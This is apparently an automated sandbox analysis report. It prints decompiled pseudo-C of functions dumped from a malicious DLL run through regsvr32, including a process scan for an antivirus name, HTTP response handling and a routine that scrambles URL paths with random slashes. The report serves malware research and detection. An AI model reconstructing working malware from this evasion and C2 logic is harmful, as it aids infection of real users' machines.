                    0x04f93dc8
                    0x04f93dd5
                    0x04f93ddb
                    0x04f93de1
                    0x04f93de5
                    0x04f93deb
                    0x04f93df8
                    0x04f93dfc
                    0x04f93e02
                    0x04f93e05
                    0x04f93e0b
                    0x04f93e11
                    0x04f93e17
                    0x04f93e1a
                    0x04f93e1d
                    0x04f93e23
                    0x04f93e2c
                    0x04f93e32
                    0x04f93e33
                    0x04f93e36
                    0x04f93e37
                    0x04f93e38
                    0x04f93e40
                    0x04f93e41
                    0x04f93e42
                    0x04f93e44
                    0x04f93e48
                    0x04f93e4c
                    0x00000000
                    0x00000000
                    0x04f93e52
                    0x04f93e5b
                    0x04f93e61
                    0x04f93e6b
                    0x04f93e6f
                    0x04f93e71
                    0x04f93e7e
                    0x04f93e82
                    0x04f93e8a
                    0x04f93e8f
                    0x04f93ea1
                    0x04f93ea3
                    0x04f93ea9
                    0x04f93ea9
                    0x04f93eb2
                    0x04f93eb2
                    0x04f93eb4
                    0x04f93eba
                    0x04f93eba
                    0x04f93ebd
                    0x04f93ec3
                    0x04f93ec6
                    0x04f93ecf
                    0x00000000
                    0x00000000
                    0x00000000
                    0x04f93ecf
                    0x04f93e23
                    0x04f93e1d
                    0x04f93e05
                    0x04f93ed5
                    0x04f93ed5
                    0x04f93edb
                    0x04f93edb
                    0x04f93ee1
                    0x04f93ee1
                    0x04f93eea
                    0x04f93ef0
                    0x04f93ef0
                    0x04f93dac
                    0x04f93ef9

                    APIs
                    • SysAllocString.OLEAUT32(04F99290), ref: 04F93DB7
                    • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04F93E99
                    • SysFreeString.OLEAUT32(00000000), ref: 04F93EB2
                    • SysFreeString.OLEAUT32(?), ref: 04F93EE1
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: String$Free$Alloclstrcmp
                    • String ID:
                    • API String ID: 1885612795-0
                    • Opcode ID: 4ba8959f21c8f28a4ba696faf1777750794b7ee98cf3dbba2f624da6b8fcf5ea
                    • Instruction ID: 2b80eaea115e1ae14c8e12732e439dc0265f162590ccccaba39cad6d3c2c272c
                    • Opcode Fuzzy Hash: 4ba8959f21c8f28a4ba696faf1777750794b7ee98cf3dbba2f624da6b8fcf5ea
                    • Instruction Fuzzy Hash: 0B514F75D0051AEFDF11EFA8C88889EB7B5FF89704B144598E915EB210D771AD06CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F9420F Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                    Download Yara Rule
                    C-Code - Quality: 85%
                    			E04F9420F(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E04F925C1(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E04F92E5D(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E04F9375F(_t101,  &_v428, _a8, _t96 - _t81);
					E04F9375F(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E04F92E5D(_t101, 0x4f9a1d0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E04F92E5D(_a16, _a4);
						E04F91212(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L04F9818A();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L04F98184();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E04F92EE3(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E04F95776(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E04F94A1C(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x4f9a1d0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                    0x04f94212
                    0x04f9421e
                    0x04f94224
                    0x04f94229
                    0x04f9422d
                    0x04f9439f
                    0x04f943a3
                    0x04f943a3
                    0x04f94233
                    0x04f94237
                    0x04f9423d
                    0x04f9423e
                    0x04f94249
                    0x04f9424f
                    0x04f94254
                    0x04f94257
                    0x04f94271
                    0x04f94280
                    0x04f9428c
                    0x04f94296
                    0x04f9429b
                    0x04f9429d
                    0x04f942a0
                    0x04f94357
                    0x04f9435d
                    0x04f9436e
                    0x04f94381
                    0x04f94397
                    0x00000000
                    0x04f9439c
                    0x04f942a9
                    0x04f942b0
                    0x04f942b4
                    0x04f942ba
                    0x04f942bc
                    0x04f942be
                    0x04f942c0
                    0x04f942c2
                    0x04f942cc
                    0x04f942d1
                    0x04f942d3
                    0x04f942d5
                    0x04f942d6
                    0x04f942d7
                    0x04f942d8
                    0x04f942df
                    0x04f942e6
                    0x04f942e9
                    0x04f942e9
                    0x04f942b6
                    0x04f942b6
                    0x04f942b6
                    0x04f942f1
                    0x04f942f9
                    0x04f94305
                    0x04f9430a
                    0x04f9430a
                    0x04f9430f
                    0x00000000
                    0x00000000
                    0x04f94311
                    0x04f94314
                    0x04f94321
                    0x00000000
                    0x00000000
                    0x04f94323
                    0x04f94323
                    0x04f94330
                    0x04f9430a
                    0x04f9430f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x04f9430f
                    0x04f9433a
                    0x04f9433d
                    0x04f94340
                    0x04f94347
                    0x04f94347
                    0x04f94354
                    0x00000000
                    0x04f94354
                    0x04f94240
                    0x04f94244
                    0x04f94245
                    0x04f94247
                    0x00000000
                    0x00000000
                    0x00000000
                    0x04f94247
                    0x00000000

                    APIs
                    • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04F942C2
                    • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04F942D8
                    • memset.NTDLL ref: 04F94381
                    • memset.NTDLL ref: 04F94397
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: memset$_allmul_aulldiv
                    • String ID:
                    • API String ID: 3041852380-0
                    • Opcode ID: b518ca590cc952557319b2b6919a0842a802d25412c06274c429bb209c04a80e
                    • Instruction ID: 871ebc9537c6d3fc4a8831531e56056d4c47399adb697352679029322081a52d
                    • Opcode Fuzzy Hash: b518ca590cc952557319b2b6919a0842a802d25412c06274c429bb209c04a80e
                    • Instruction Fuzzy Hash: 65419F31A00219ABFF14AE68DC80BEE77A5EF55314F104569A919A7280DB70BE468B91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F9135F Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                    Download Yara Rule
                    C-Code - Quality: 42%
                    			E04F9135F(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				void* _t30;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					_push( &_v8);
					_push(4);
					_push( &_v20);
					_push( *((intOrPtr*)(_t69 + 0x18)));
					if( *0x4f9a164() != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x4f9a174(0, 1,  &_v12);
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E04F963FD(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_push( &_v8);
										_push(0x1000);
										_push(_v16);
										_push( *((intOrPtr*)(_t69 + 0x18)));
										if( *0x4f9a164() != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E04F95867( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E04F917AB(_v16);
										if(_t64 == 0) {
											_t64 = E04F916E7(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E04F95867( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E04F958EE(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}
















                    0x04f9135f
                    0x04f91360
                    0x04f91366
                    0x04f91371
                    0x04f91371
                    0x04f91373
                    0x04f92402
                    0x04f92407
                    0x04f92409
                    0x04f9240e
                    0x04f9240f
                    0x04f92414
                    0x04f92415
                    0x04f92420
                    0x04f92451
                    0x04f92456
                    0x04f92519
                    0x04f9245c
                    0x04f92463
                    0x04f9246b
                    0x04f92516
                    0x04f92471
                    0x04f92476
                    0x04f9247d
                    0x04f92480
                    0x04f92508
                    0x04f92486
                    0x04f92486
                    0x04f92488
                    0x04f9248e
                    0x04f9248f
                    0x04f9248f
                    0x04f92492
                    0x04f92495
                    0x04f9249b
                    0x04f924a0
                    0x04f924a1
                    0x04f924a6
                    0x04f924a9
                    0x04f924b4
                    0x00000000
                    0x00000000
                    0x04f924bc
                    0x04f924c4
                    0x04f924d0
                    0x04f924d4
                    0x04f924d6
                    0x04f924db
                    0x00000000
                    0x00000000
                    0x04f924db
                    0x04f924d4
                    0x04f924ed
                    0x04f924f0
                    0x04f924f7
                    0x04f92502
                    0x04f92502
                    0x00000000
                    0x04f924dd
                    0x04f924dd
                    0x04f924e2
                    0x04f924e4
                    0x04f924e5
                    0x04f924e8
                    0x00000000
                    0x04f924e8
                    0x00000000
                    0x04f924e2
                    0x04f9248f
                    0x04f92509
                    0x04f92509
                    0x04f9250f
                    0x04f9250f
                    0x04f9246b
                    0x04f92422
                    0x04f92428
                    0x04f92430
                    0x04f92449
                    0x04f9244b
                    0x00000000
                    0x00000000
                    0x04f92432
                    0x04f9243c
                    0x04f92440
                    0x04f92446
                    0x00000000
                    0x04f92446
                    0x04f92440
                    0x04f92430
                    0x04f92522
                    0x04f91368
                    0x04f91368
                    0x04f9136f
                    0x04f9137a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x04f9136f

                    APIs
                    • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74E481D0), ref: 04F92409
                    • GetLastError.KERNEL32(?,?,?,00000000,74E481D0), ref: 04F92422
                    • ResetEvent.KERNEL32(?), ref: 04F9249B
                    • GetLastError.KERNEL32 ref: 04F924B6
                      • Part of subcall function 04F958EE: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 04F95905
                      • Part of subcall function 04F958EE: SetEvent.KERNEL32(?), ref: 04F95915
                      • Part of subcall function 04F958EE: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 04F95947
                      • Part of subcall function 04F958EE: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04F9596C
                      • Part of subcall function 04F958EE: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04F9598C
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: EventHttpInfoQuery$ErrorLastReset$ObjectSingleWait
                    • String ID:
                    • API String ID: 2176574591-0
                    • Opcode ID: 2791f8ae5e213772ed6d043c77a6dfb8a6a5e2e2283b6cbb8e697f50992caf88
                    • Instruction ID: 94de3b99ea10028df7be3c359281bbb2849a5ae5af1e6b6718a32d178ff9ac1b
                    • Opcode Fuzzy Hash: 2791f8ae5e213772ed6d043c77a6dfb8a6a5e2e2283b6cbb8e697f50992caf88
                    • Instruction Fuzzy Hash: C541B432E00204BBFF229FA9DC44E9A77F9AF84364F1609A4E555D3151EB30FD469B50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F93FD2 Relevance: 6.1, APIs: 4, Instructions: 95synchronizationCOMMON
                    Download Yara Rule
                    C-Code - Quality: 87%
                    			E04F93FD2(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				void* _t26;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x4f9a310; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x4f9a320; // 0xb2d5a8
				_t3 = _t8 + 0x4f9b87e; // 0x61636f4c
				_t25 = 0;
				_t30 = E04F932D0(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x4f9a34c, 1, 0, _t30);
					E04F917AB(_t30);
				}
				_t12 =  *0x4f9a2fc; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E04F92AB4() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E04F9196A(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x4f9a118( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E04F978DB(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}















                    0x04f93fd3
                    0x04f93fda
                    0x04f93fe4
                    0x04f93fe8
                    0x04f93fee
                    0x04f93ffd
                    0x04f94004
                    0x04f94008
                    0x04f9401a
                    0x04f9401c
                    0x04f9401c
                    0x04f94021
                    0x04f94028
                    0x04f9407d
                    0x04f9407d
                    0x04f94083
                    0x04f94085
                    0x04f94085
                    0x04f9408f
                    0x04f94093
                    0x04f940a5
                    0x04f940a5
                    0x04f940a9
                    0x04f940af
                    0x04f940af
                    0x00000000
                    0x04f94041
                    0x04f94046
                    0x04f9404e
                    0x04f94050
                    0x04f94054
                    0x04f94054
                    0x04f94061
                    0x04f94065
                    0x04f94069
                    0x04f940be
                    0x04f940c4
                    0x04f940c4
                    0x04f94077
                    0x04f9407b
                    0x04f940b2
                    0x04f940b4
                    0x04f940b7
                    0x04f940b7
                    0x00000000
                    0x04f940b4
                    0x04f9407b
                    0x00000000
                    0x04f94065

                    APIs
                      • Part of subcall function 04F932D0: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,05AC9D58,00000000,?,?,69B25F44,00000005,04F9A00C,4D283A53,?,?), ref: 04F93306
                      • Part of subcall function 04F932D0: lstrcpy.KERNEL32(00000000,00000000), ref: 04F9332A
                      • Part of subcall function 04F932D0: lstrcat.KERNEL32(00000000,00000000), ref: 04F93332
                    • CreateEventA.KERNEL32(04F9A34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,04F9186F,?,?,?), ref: 04F94013
                      • Part of subcall function 04F917AB: HeapFree.KERNEL32(00000000,00000000,04F92976,00000000,?,?,00000000), ref: 04F917B7
                    • WaitForSingleObject.KERNEL32(00000000,00004E20,04F9186F,00000000,00000000,?,00000000,?,04F9186F,?,?,?), ref: 04F94071
                    • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,04F9186F,?,?,?), ref: 04F9409F
                    • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,04F9186F,?,?,?), ref: 04F940B7
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                    • String ID:
                    • API String ID: 73268831-0
                    • Opcode ID: 26be070403fd9de3876a5ae6a1b3fa098fda649675750979b0ed27a7df7c3ce2
                    • Instruction ID: f2c7bcfbbd400ddd6a798cdab39ffd544976d09c78cc6bcf5f6a44464a7aac2d
                    • Opcode Fuzzy Hash: 26be070403fd9de3876a5ae6a1b3fa098fda649675750979b0ed27a7df7c3ce2
                    • Instruction Fuzzy Hash: C0214632D14305BBFF315B68AC84E6B73E8EF98B14F050218F9569B222DB61EC038655
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F917C0 Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                    Download Yara Rule
                    C-Code - Quality: 39%
                    			E04F917C0(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E04F96710(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E04F9238A(_t23);
						}
					}
					return _t38;
				}
				if(E04F940C7(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x4f9a34c, 1, 0,  *0x4f9a3e4);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E04F95E53(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E04F92B1E(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E04F94B59(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E04F93FD2( &_v32, _t39);
					goto L13;
				}
			}












                    0x04f917c0
                    0x04f917cd
                    0x04f917d3
                    0x04f917d4
                    0x04f917d5
                    0x04f917d6
                    0x04f917d7
                    0x04f917db
                    0x04f917e7
                    0x04f917eb
                    0x04f91873
                    0x04f91873
                    0x04f91876
                    0x04f91878
                    0x04f91880
                    0x04f91886
                    0x04f91889
                    0x04f91889
                    0x04f91886
                    0x04f91894
                    0x04f91894
                    0x04f917fe
                    0x04f91800
                    0x04f91800
                    0x04f91817
                    0x04f9181b
                    0x04f9181e
                    0x04f91829
                    0x04f91830
                    0x04f91830
                    0x04f9183c
                    0x04f9183d
                    0x04f9184b
                    0x04f9183f
                    0x04f9183f
                    0x04f91840
                    0x04f91841
                    0x04f91842
                    0x04f91843
                    0x04f91844
                    0x04f91844
                    0x04f91850
                    0x04f91855
                    0x04f91857
                    0x04f91859
                    0x04f91859
                    0x04f91860
                    0x00000000
                    0x04f91862
                    0x04f91862
                    0x04f9186f
                    0x00000000
                    0x04f9186f

                    APIs
                    • CreateEventA.KERNEL32(04F9A34C,00000001,00000000,00000040,?,?,74E5F710,00000000,74E5F730), ref: 04F91811
                    • SetEvent.KERNEL32(00000000), ref: 04F9181E
                    • Sleep.KERNEL32(00000BB8), ref: 04F91829
                    • CloseHandle.KERNEL32(00000000), ref: 04F91830
                      • Part of subcall function 04F95E53: WaitForSingleObject.KERNEL32(00000000,?,?,?,04F91850,?,04F91850,?,?,?,?,?,04F91850,?), ref: 04F95F2D
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                    • String ID:
                    • API String ID: 2559942907-0
                    • Opcode ID: 4fc735299632e8bae99882475e13e94c5876f971b2a3bde55ac572bd036ab808
                    • Instruction ID: 9a97b73e8b52491d24e48b8d191ca3146e6bec825216afa3d37a764df7166bc3
                    • Opcode Fuzzy Hash: 4fc735299632e8bae99882475e13e94c5876f971b2a3bde55ac572bd036ab808
                    • Instruction Fuzzy Hash: 2F21D373E0010ABBFF20AFF489809DE73E9EB04350B014479E921A3100DB75BD079BA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F95ACD Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 68%
                    			E04F95ACD(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x4f9a2d8, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x4f9a2f0; // 0xcfe3a42c
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x4f9a2f0 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                    0x04f95ad5
                    0x04f95ad8
                    0x04f95ade
                    0x04f95af6
                    0x04f95afa
                    0x04f95afd
                    0x04f95aff
                    0x04f95b02
                    0x04f95b04
                    0x04f95b07
                    0x04f95b09
                    0x04f95b09
                    0x04f95b0b
                    0x04f95b16
                    0x04f95b1b
                    0x04f95b2c
                    0x04f95b34
                    0x04f95b39
                    0x04f95b3c
                    0x04f95b3f
                    0x04f95b41
                    0x04f95b47
                    0x04f95b4a
                    0x04f95b4a
                    0x04f95b4a
                    0x04f95b55
                    0x04f95b5a
                    0x04f95b64

                    APIs
                    • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04F9194D,00000000,?,?,04F96ABB,?,05AC95B0), ref: 04F95AD8
                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F95AF0
                    • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04F9194D,00000000,?,?,04F96ABB,?,05AC95B0), ref: 04F95B34
                    • memcpy.NTDLL(00000001,?,00000001), ref: 04F95B55
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: memcpy$AllocateHeaplstrlen
                    • String ID:
                    • API String ID: 1819133394-0
                    • Opcode ID: 8233c94d4261d1b689566148a1686088144cc1167107a325e0cfff13d7a71d53
                    • Instruction ID: 8f71ef2ad36cea8968b04d3ca6a5b27a4d0a403a74974ac5aac3438ae0460f40
                    • Opcode Fuzzy Hash: 8233c94d4261d1b689566148a1686088144cc1167107a325e0cfff13d7a71d53
                    • Instruction Fuzzy Hash: 45110672E00218BFEB158F69EC84E9EBBEDEB80360B050166F50497250EB75AE05C7A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F92AB4 Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                    Download Yara Rule
                    C-Code - Quality: 68%
                    			E04F92AB4() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x4f9a320; // 0xb2d5a8
						_t2 = _t9 + 0x4f9bea8; // 0x73617661
						_push( &_v264);
						if( *0x4f9a110() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                    0x04f92abf
                    0x04f92ac9
                    0x04f92acd
